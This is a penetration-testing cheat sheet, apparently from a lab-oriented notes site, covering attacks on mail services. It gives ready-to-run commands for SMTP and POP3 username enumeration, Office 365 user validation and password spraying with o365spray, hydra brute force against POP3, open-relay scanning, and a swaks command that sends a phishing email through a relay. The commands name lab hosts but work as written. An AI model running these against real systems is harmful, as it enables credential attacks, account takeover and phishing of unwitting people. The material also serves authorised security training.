enumeration

Check mail server

host -t MX hackthebox.eu
dig mx inlanefreight.htb | grep "MX" | grep -v ";"

Check A record

host -t A mail1.inlanefreight.htb
# SMTP has different commands that can be used to enumerate valid usernames using VRFY,EXPN,RCPT TO.

Enumerate usernames

SMTP

telnet <ip> 25
VRFY root
VRFY www-data
EXPN john
	
MAIL FROM:test@htb.com
It is
RCPT TO:julio
RCPT TO:kate

POP3

telenet "$ip" port
User julio

Automate username enumeration

smtp-user-enum

smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

Cloud enumeration

o365spray

python3 o365spray.py --validate --domain msplaintext.xyz
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz

Password attack (hydra)

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

Password spraying attack

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

Open relay attack

nmap -p25 -Pn --script smtp-open-relay 10.10.11.213

Connect with mail server

swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213

Previousabuse Nextsnmp

Last updated 1 day ago

hashtagCheck mail server

hashtagCheck A record

hashtagEnumerate usernames

Check mail server

Check A record

Enumerate usernames